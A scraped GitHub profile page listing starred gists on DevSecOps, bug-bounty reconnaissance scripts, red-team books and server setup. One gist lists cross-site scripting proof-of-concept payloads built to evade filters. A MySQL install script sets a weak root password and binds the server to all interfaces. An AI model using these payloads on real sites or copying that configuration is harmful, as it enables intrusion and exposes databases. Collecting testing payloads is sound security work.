Skip to content

Instantly share code, notes, and snippets.

View rulin132's full-sized avatar
πŸ„β€β™‚οΈ
Riding the waves of life.

Gavin Dibley rulin132

πŸ„β€β™‚οΈ
Riding the waves of life.
7 followers · 11 following
View GitHub Profile
@apolloclark
apolloclark / devsecops_maturity_model.md
Last active October 8, 2024 01:35
DevSecOps Maturity Model

DevSecOps Maturity Model

DevSecOps has finally become popular within the wider IT industry in 2019. I started as a web developer in 2001, learned about testing automation, system deployment automation, and "infrastructure as code" in 2012, when DevOps was becoming a popular term. DevOps became common after the release of The Phoenix Project in Jan 2013. It has taken 7+ years for security to become integrated within the DevOps methodology. The following is a list of concepts I go through with project owners, project managers, operations, developers, and security teams, to help establish how mature their DevOps and security automation is, and to help them increase that maturity over time. This model is based on experience consulting with a variety of US Financial, Healthcare, and Department of Defense, organizations, and combines:

@xdavidhu
xdavidhu / converter.sh
Last active September 1, 2024 10:56
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
#!/bin/bash
# Converter.sh by @xdavidhu
# This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix
# With this script, you can convert domain lists to resolved IP lists without duplicates.
# Usage: ./converter.sh [domain-list-file] [output-file]
echo -e "[+] Converter.sh by @xdavidhu\n"
if [ -z "$1" ] || [ -z "$2" ]; then
echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]"
exit 1
@jhaddix
jhaddix / Testing_Checklist.md
Last active September 22, 2025 03:46 — forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
@tomnomnom
tomnomnom / alert.js
Last active October 25, 2025 05:02
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@elialejandro
elialejandro / AutoinstallMYSQL.sh
Last active July 7, 2020 17:08
MySQL 5.7 No directory, logging in with HOME=/
# Install MySQL
mysql_config_file="/etc/mysql/my.cnf"
echo "mysql-server mysql-server/root_password password secret" | sudo debconf-set-selections
echo "mysql-server mysql-server/root_password_again password secret" | sudo debconf-set-selections
apt-get -y install mysql-client mysql-server
sed -i "s/bind-address\s*=\s*127.0.0.1/bind-address = 0.0.0.0/" ${mysql_config_file}
usermod -d /var/lib/mysql/ mysql
@jahe
jahe / devopscon-2017-notes.md
Last active January 8, 2019 21:01
DevOpsCon 2017 Notes

Glossar

A/B Testing - Two groups of users (A and B) interact with different versions of the app (e.g. Design is different). The version with a better conversion rate wins.

Monday

09:30 - 17:00 (Salon 4) - Web Hacking: Pentesting and attacking Web Apps

http://christian-schneider.net/downloads/Toolbased_WebPentesting.pdf FindBugs + FindSecurityBugs - Plugins in Eclipse

CVE

CVE-ID - One vulnerabilty in a CVE registry. It includes a score

@akirattii
akirattii / docker-mysql-slow-query-log.md
Last active July 14, 2023 22:12
memo: MySQL docker container settings for slow query log

Check running mysql container:

$ sudo docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                    NAMES
26137efa979f        mysql               "docker-entrypoint..."   8 months ago        Up 10 minutes       0.0.0.0:3306->3306/tcp   container-mysql

Check docker container mysql version:

$ sudo docker exec container-mysql mysqld --version`
mysqld  Ver 5.7.15 for Linux on x86_64 (MySQL Community Server (GPL))
@carnal0wnage
carnal0wnage / gist:606c41ac6ec40bf5c69d4db96d9312e3
Created April 28, 2017 16:07
Red Team Books
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@wataruoguchi
wataruoguchi / How to make your website to maintenance mode.md
Last active January 7, 2024 14:28
How to make your website to maintenance mode - Apache

Apache

How to make your website to maintenance mode

  1. Put maintenance.html into your root directory

  2. Open .htaccess file

  3. Insert this block in the first line of the file

     ErrorDocument 503 /maintenance.html
 <IfModule mod_rewrite.c>

RewriteEngine On

@pavelrogala
pavelrogala / autoLink.php
Created May 4, 2014 04:28
Regex function for adding link tags in PHP.